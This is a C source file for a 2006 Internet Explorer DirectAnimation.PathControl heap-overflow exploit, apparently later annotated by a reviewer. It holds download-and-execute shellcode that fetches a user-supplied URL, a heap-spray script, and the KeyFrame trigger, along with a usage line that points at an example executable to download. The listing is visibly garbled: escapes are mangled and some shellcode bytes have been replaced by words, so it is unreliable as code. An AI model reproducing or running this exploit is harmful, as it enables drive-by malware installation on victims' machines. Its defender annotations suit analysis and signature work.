/*
*-----------------------------------------------------------------------
*
* Daxctle2.c - Internet Explorer COM Object Heap Overflow download EXEC Exploit
*!!! 0 day !!! Public version !!!
*
* Copyright (c) 2006 xsec All Rights Reserved.
*
* Author: NOP
*: NOP # xsec.org
*: Http://www.xsec.org
*:
* Tested: Windows 2000 Server SP4 CN
*: + Internet Explorer 6.0 SP1
*: Windows XP SP2 CN
*: + Internet Explorer 6.0 SP1 (you need some good luck!)
*:
* Compile: CL daxctle2.c
*:
* Usage: D:/> daxctle2
*:
*: Usage: daxctle <URL> [htmlfile]
*:
*: D:/> daxctle2 http://xsec.org/xxx.exe xxx.htm
*:
*
*------------------------------------------------------------------------
*/
# Include <stdio. h>
# Include <stdlib. h>
// NOTE(review): this listing has been through text processing that altered
// identifier capitalization (File/Char/Printf/If ...) and turned "\x", "\n" and
// "\"" escapes into "/x", "/N" and "/"". C is case-sensitive, so the text as
// reproduced here does not compile; comments below describe the apparent intent.
// Output stream for the generated HTML page. main() opens it with fopen() and
// never fclose()s it; the data is pushed out by the fflush() calls and by
// normal process termination.
File * fp = NULL;
// Name of the output HTML file; main() overrides it with argv[2] when given.
// NOTE(review): the literal as reproduced here ends in a space, which would
// become part of the file name -- presumably a transcription artifact.
Char * file = "xsec.htm ";
// Download URL taken from argv[1]; main() copies it right after the payload
// bytes before they are encoded into the page.
Char * url = NULL;
// Download exec Shellcode by NOP
// Raw payload bytes. printuc() re-encodes them (plus the URL that main()
// appends, NUL-terminated) as %uXXXX escapes into the page's `shellcode`
// string; sizeof (SC)-1 in main() excludes the literal's trailing NUL.
// NOTE(review): as reproduced here the literal is not valid C -- the escapes
// use "/x" instead of "\x" and several byte groups have been replaced by words
// ("Cross-city", "Xi 'an") by whatever text processing produced this copy, so
// the original byte sequence is not recoverable from this listing. Treat it as
// a historical artifact for signature/analysis purposes, not a buildable sample.
Unsigned char SC [] =
"/Xe9/xa3/x00/x00/x00/x5f/x64/xA1/x30/x00/x00/x00/x8b/X40/x0c/x8b"
"/Cross-city/x1c/XAD/x8b/x68/x08/x8b/xf7/x6a/x04/x59/xe8/x43/x00/x00/x00"
"/Xe2/xf9/x68/x6f/x6e/x00/x00/x68/x75/x72/x6c/x6d/x54/xFF/x16/x95"
"/Xe8/x2e/x00/x00/x00/x83/xec/x20/x8b/xdc/x6a/x20/x53/xFF/x56/x04"
"/Xc7/x04/x03/x5c/x61/x2e/X65/xc7/x44/x03/x04/x78/X65/x00/x00/x33"
"/Xc0/x50/x50/x53/x57/x50/xFF/x56/x10/x8b/xdc/x50/x53/xFF/x56/x08"
"/XFF/x56/x0c/x51/x56/x8b/x75/x3c/x8b/x74/x2e/x78/x03/xf5/x56/x8b"
"/X76/x20/x03/xf5/x33/xc9/x49/x41/XAD/x03/xc5/x33/XDB/x0f/xbe/x10"
"/X3a/xd6/x74/x08/xc1/xcb/x0d/x03/xda/X40/xeb/xf1/x3b/x1f/x75/xe7"
"/X5e/x8b/x5e/x24/x03/xdd/x66/x8b/x0c/x4b/x8b/x5e/x1c/x03/xdd/x8b"
"/X04/x8b/x03/xc5/XAB/x5e/x59/xc3/xe8/x58/xFF/x8e/x4e/x0e"
"/Xec/xc1/x79/xe5/xb8/x98/xfe/x8a/x0e/XeF/xce/xe0/X60/x36/x1a/x2f"
"/Xi 'an ";
// Opening half of the generated page: HTML prologue plus the start of the
// script, which begins the JavaScript `shellcode` string with three %u4343
// words and leaves it open with a trailing `+`. printuc() continues that
// concatenation with the encoded payload and closes it; `footer` finishes the
// script and the document.
// NOTE(review): main() refers to this as `header` (lower-case); the mismatch
// is one of the capitalization artifacts of this copy. "/N" and "/"" are
// presumably mangled "\n" and "\"" escapes.
Char * Header =
"<HTML>/N"
"<Head>/N"
"<Title> xsec.org </title>/N"
"</Head>/N"
"<Body>/N"
"<SCRIPT>/N"
"Shellcode = Unescape (/" % u4343/"+/" % u4343/"+/" % u4343/"+/N ";
// Change this script by yourself.
// Closing half of the generated page. The script builds a padding string from
// 0x0d0d words (`bigbk` / `fillbk` / `BK`), fills an 800-element array with
// padding + `shellcode` copies (a heap spray), then instantiates the
// DirectAnimation.PathControl ActiveX object and calls KeyFrame() with an
// apparently oversized first argument to trigger the overflow the file header
// names. Per that header the target is IE 6.0 SP1 on Windows 2000 SP4 / XP SP2.
// Defender's view: the page-visible indicators are the unescape("%u0d0d%u0d0d")
// padding, the 800-iteration array fill of padding + shellcode, and the
// ActiveXObject("DirectAnimation.PathControl") / KeyFrame(0x7fffffff, ...) call
// -- the strings a content filter or IDS signature for this page would key on.
// NOTE(review): "/N" and "/"" are presumably mangled "\n" / "\"" escapes, as in
// the other literals of this copy.
Char * footer =
"Bigbk = Unescape (/" % u0d0d % u0d0d/");/N"
"Headersize = 20;/N"
"Slackspace = headersize + shellcode. Length/N"
"While (bigbk. Length <slackspace) bigbk + = bigbk;/N"
"Fillbk = bigbk. substring (0, slackspace);/N"
"BK = bigbk. substring (0, bigbk. Length-slackspace);/N"
// BK = NOP + NOP ;-)
"While (BK. Length + slackspace <0x40000) BK = BK + fillbk;/N"
"Memory = new array ();/N"
"For (I = 0; I <800; I ++) memory [I] = BK + shellcode;/N"
"Var target = new activexobject (/" DirectAnimation. PathControl/");/N"
"Target. keyframe (0x7fffffff, new array (1), new array (65535);/N"
"</SCRIPT>/N"
"</Body>/N"
"</Html>/N ";
// Print Unicode shellcode
// Writes `buffsize` bytes of `lpbuff` as 16-bit words in %uXXXX form, both to
// stdout and to the open output stream `fp`. Every 16 bytes the current quoted
// JavaScript fragment is closed and a new one opened (the file copy gets a `+`
// continuation, the stdout copy does not), and at the end the string is
// terminated with `";` so the `shellcode = ... +` concatenation started by the
// page header is complete.
// NOTE(review): the loop steps by 2 and indexes `(unsigned short *) lpbuff`, so
// an odd `buffsize` reads one byte past the length the caller passed (harmless
// for main()'s zeroed 1024-byte buffer, a latent over-read for any other
// caller), and the cast assumes 2-byte alignment of `lpbuff`.
// NOTE(review): `If (I % 16) = 0)` looks like a transcription of
// `if ((i % 16) == 0)`, and `"% u % 0.4x"` of `"%%u%0.4x"` (a literal "%u" plus
// four hex digits); as written neither is valid. `J`, `P` and `MSG` are unused.
Void printuc (char * lpbuff, int buffsize)
{
Int I, J;
Char * P;
Char MSG [4];
For (I = 0; I <buffsize; I + = 2)
{
If (I % 16) = 0)
{
If (I! = 0)
{
// Close the previous 8-word fragment and open the next one.
Printf ("/"/n /"");
Fprintf (FP, "% s", "/" +/n /"");
}
Else
{
// First fragment: just open the quote.
Printf ("/"");
Fprintf (FP, "% s ","/"");
}
}
Printf ("% u % 0.4x", (unsigned short *) lpbuff) [I/2]);
Fprintf (FP, "% u % 0.4x", (unsigned short *) lpbuff) [I/2]);
}
// Terminate the JavaScript string and statement.
Printf ("/";/N ");
Fprintf (FP, "% s", "/");/N ");
Fflush (FP );
}
// Entry point: checks the download URL from argv[1], opens the output HTML
// file (argv[2], default `file`) and writes header + %u-encoded
// (payload || URL || NUL) + footer to it.
// NOTE(review): `void main` is non-standard (should be `int main` returning a
// status); the usage path calls Exit(1) while the later failure paths use
// `Return;` from a void main, so those leave the exit status unspecified.
// NOTE(review): strstr()/strlen()/memset()/memcpy() need <string.h>, which the
// includes above this listing do not show.
Void main (INT argc, char ** argv)
{
// 1 KiB scratch buffer: payload bytes followed by the URL; the zero fill
// supplies the URL's terminating NUL.
Unsigned char Buf [1024] = {0 };
Int SC _len = 0;
If (argc <2)
{
Printf ("Internet Explorer COM Object Remote Heap Overflow download EXEC Exploit/N ");
Printf ("code by NOP # xsec.org, welcome to http://www.xsec.org/N ");
// Printf ("!!! 0 day !!! Please keep private !!! /N ");
Printf ("/R/nusage: % S <URL> [htmlfile]/R/n", argv [0]);
Exit (1 );
}
Url = argv [1];
// NOTE(review): strstr() matches the scheme anywhere in the string, not only
// at the start, so the "must start with" message overstates this check; only
// a minimum length of 10 is enforced, and the upper bound (<60) that the
// commented-out variant carried has been dropped -- see the copy below.
// If ((! Strstr (URL, "http ://")&&! Strstr (URL, "ftp: //") | strlen (URL) <10 | strlen (URL)> 60)
If ((! Strstr (URL, "http ://")&&! Strstr (URL, "ftp: //") | strlen (URL) <10)
{
// Printf ("[-] Invalid URL. must start with 'HTTP: // ', 'ftp: //' and <60 bytes./N ");
Printf ("[-] Invalid URL. must start with 'HTTP: // ', 'ftp: //'/N ");
Return;
}
Printf ("[+] Download URL: % s/n", URL );
If (argc> = 3) file = argv [2];
Printf ("[+] exploit file: % s/n", file );
// NOTE(review): opened for writing and never fclose()d; the stream is only
// fflush()ed. Mode "W " is presumably a transcription of "w".
Fp = fopen (file, "W ");
If (! FP)
{
Printf ("[-] Open File error! /N ");
Return;
}
// Print HTML Header
Fprintf (FP, "% s", header );
Fflush (FP );
// Print shellcode
// NOTE(review): Buf is 1024 bytes and the URL length is not bounded above, so
// the second memcpy() overflows the stack buffer for a URL longer than about
// 1024 - (sizeof (SC) - 1) bytes, and printuc() is then asked to read past it
// as well. Restoring the upper-length check or bounding the copy to
// sizeof (BUF) would close that.
Memset (BUF, 0, sizeof (BUF ));
SC _len = sizeof (SC)-1;
Memcpy (BUF, SC, SC _len );
Memcpy (BUF + SC _len, URL, strlen (URL ));
// +1 covers the URL's NUL terminator, which comes from the zeroed buffer.
SC _len + = strlen (URL) + 1;
Printuc (BUF, SC _len );
// Print HTML footer
Fprintf (FP, "% s", footer );
Fflush (FP );
Printf ("[+] exploit write to % s success! /N ", file );
}